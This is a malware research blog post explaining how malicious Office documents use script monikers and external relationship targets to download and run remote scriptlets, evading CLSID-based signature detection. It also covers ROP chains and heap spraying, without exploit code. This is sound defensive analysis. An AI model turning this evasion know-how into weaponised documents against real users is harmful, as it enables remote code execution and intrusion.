When Scriptlets Attack: The Moniker
Authored by: Alexander Sevtsov
Edited by: Stefano Ortolani
In the previous article, we have described an attack that makes use of a script moniker to execute a Windows Script Component (WSC) file or scriptlet. A scriptlet is nothing more than an XML-file wrapping a script like JScript, VBScript, etc. With this method, neither macros nor shellcode are required to run arbitrary code, opening a huge door for cybercriminals to break into an end user system without having to develop sophisticated exploits, or generate highly obfuscated macro code, but still using document files and logic flaws in Microsoft Office to deliver malware.
In this article, we will go through the details of how document files can achieve remote code execution by using monikers crafted to evade signature-based detection techniques relying on blacklisted CLSIDs, and how these monikers function under the hood.
It’s worth mentioning that it’s not the first time we have seen document exploits abusing logic flaws. We previously have seen this in the CVE-2017-0199 (HTA-handler) and CVE-2017-8759 (SOAP WSDL parser) vulnerabilities. One particularly interesting detail that has caught our attention for this blog post is how crooks evade static document detection of potentially dangerous CLSIDs embedded in OLE streams: these CLSIDs are widely used in document exploits to load specific non-ASLR COM libraries, a step necessary to bypass mitigation techniques, such as ASLR and DEP.
Code Execution in Documents
The most interesting part for a researcher when analyzing a malicious document file is to understand what kind of methods are involved to achieve code execution. Answering this question is the most essential step to developing strong protection mechanisms against upcoming threats.
One straightforward way to perform code execution from a document file is to embed (typically highly-obfuscated) macro code. This, however, is easily circumvented by modern static analysis tools, code emulators, sandboxes, and machine learning systems that are able to find this type of anomaly and immediately block the threat. Moreover, Microsoft Office disables macro code execution by default, preventing the end user from being infected in the first place. The only remaining approach is to persuade the user to enable macro code execution manually. However, this is a well known malicious technique-enabling macro code execution for documents coming from an untrusted resource is known to be dangerous.
Another approach is to use shellcode or position independent code. To build an exploit, the attacker usually utilizes base addresses of known non-ASLR executables to either directly run an external program (see Figure 1 for a sample exploiting CVE-2017-11882) or “slide” the execution flow to the shellcode through a long sequence of instructions, also known as ROP chains.
These ROP chains are used to bypass Data Execution Prevention (DEP) by executing small pieces of libraries’ code to change the protection of memory allocated for further shellcode execution.
To increase the probability of successful shellcode execution, the attacker uses heap spraying, a method to allocate and fill (large) blocks of virtual memory. By using this method, the attacker fills the memory with RET-sleds (along with NOP-sleds) and shellcode (usually stored in the ActiveX streams). Later, leveraging a vulnerability, the execution flow is transferred somewhere in that memory region, and both gadgets and shellcode are finally executed (see Figure 2 for an example).
The RET-sleds are instructions that may have the following format (for example, the non-ASLR library MSVBVM60.dll, СVE-2017-11826):
Their aim is to move the current stack pointer, ESP, down until the execution flow reaches the VirtualProtect function (or any other function that changes the memory protection to bypass the DEP):
Both methods – DEP and ASLR bypass, along with shellcode patterns and suspicious embedded objects (OLE) — are known for quite a while by malware authors and security researchers. A huge weakness of this method is that libraries must be loaded at a predictable memory location otherwise, if the location is random (as it is the case with ASLR enabled), or the version of the library is unexpected, the attack will fail.
And this is the biggest problem for the attacker.
Monikers: A New Way to Execute Code
For those who are not familiar with this concept, a moniker is just an object that names another one—that is, a symbolic name of an object, an interface to data coupled with its associated context. There are several types of monikers provided by the Microsoft Windows operating system: File, Class, Composite, and URL monikers, to name a few. Some of them (such as SOAP moniker) are already known to have logic bugs that lead to remote code execution.
Monikers are specified as names instead of CLSIDs. Thus, instead of calling CoCreateInstance to load a COM library associated with a specified CLSID, an application calls the COM MkParseDisplayName API to convert the string name into a moniker. Practically, this means that there is no need to embed a CLSID in a document file to load a specific object (such as a non-ASLR module), which could raise suspicion on the target machine. It’s also worth mentioning that, as opposed to the LoadLibrary API used to load a normal Windows DLL, COM libraries are loaded by either calling the CoCreateInstance API or a custom creation function (in the case of monikers).
Static Document Analysis: External Objects
The picture below (sha1: c5b1abceeda2d4607b3d8890979980d553ab1937) is an example of how an external object looks like when embedded in a suspicious document:
As we can see, the embedded OLE is an external resource, outside the document package. This is expressed by the TargetMode attribute of the Relationship element set to External. The Target attribute defines the actual location of the related resource which, in this case, contains the URL (the moniker data) together with the script keyword (the moniker class) needed to specify how to interpret the resource.
Dynamic Document Analysis: Script Monikers
As we have mentioned above, the malicious document can just use a name, parsed by MkParseDisplayName API, to create the necessary object and access the IMoniker interface. After calling the MkParseDisplayName, a client (such as the Microsoft Office process) calls OleCreateLink to run the remote scriptlet file (see Figure 4).
To start working with the moniker, the client calls the CreateBindCtx API to create a bind context that contains the information about a moniker binding operation. Then, after creating a moniker (MkParseDisplayName), it invokes BindToObject to activate the script engine and execute the file (a scriptlet in our case).
If you recall, each name of the script moniker is a combination of the moniker class and the moniker data separated by a colon. Thus, to parse the moniker string, the MkParseDisplayName API internally calls FindClassMoniker and later FindProgIdMoniker:
The FindClassID function is then responsible for splitting the prefix (the moniker class) from the URI (moniker data):
Once done, the moniker class causes the respective library to be loaded in the Microsoft Office process: in our example, the moniker class is script, so the scrobj.dll is loaded. This is achieved by looking up the registry key value stored for the CLSID:
In order to find the value, the function OpenClassesRootKeyExW goes to the HKEY_CLASSES_ROOT registry section and look for the moniker class name, which is script:
The second part of the moniker name, the moniker data, is interpreted as a hyperlink to a scriptlet file that will be downloaded (by calling the HttpSendRequestW function) from the remote server. To decode the gzipped scriptlet file, MS Office calls ConvertXMLBytesToUnicode from the already loaded scriptlet run-time component (scrobj.dll):
Then the library parses the XML file, compiles the embedded code (VBScript, JScript, etc.) and, finally, executes it.
Below is an analysis overview that illustrates Lastline’s capabilities to detect the scriptlet execution in the context of the malicious Microsoft Office Powerpoint Slideshow (PPSX) file (sha1: c5b1abceeda2d4607b3d8890979980d553ab1937):
As one can see, the sandbox is able to use not only the scriptlet’s behavior to classify the document as malicious, but it also understands how this behavior is triggered, adding yet another source of anomalies for classifying the document.
As you can see from the example described in this post, scriptlets located on a remote server can be used to run arbitrary code in Microsoft Office in addition to traditional techniques like macros and shellcode. For such attacks, the attacker can essentially abandon suspicious, hardcoded CLSIDs embedded in document files and instead just use simple names—monikers—to evade signature-based detection and achieve remote code execution.
Latest posts by Alexander Sevtsov (see all)
- I Hash You: A Simple But Effective Trick to Evade Dynamic Analysis - April 10, 2018
- Olympic Destroyer: A new Candidate in South Korea - February 21, 2018
- Smoke Loader Campaign: When Defense Becomes a Numbers Game - February 1, 2018
Latest posts by Stefano Ortolani (see all)
- Reverse Engineering Malware — A Look at How the Process Has Evolved - March 1, 2018
- Trust Me, I am a Screen Reader, not a CryptoMiner - February 11, 2018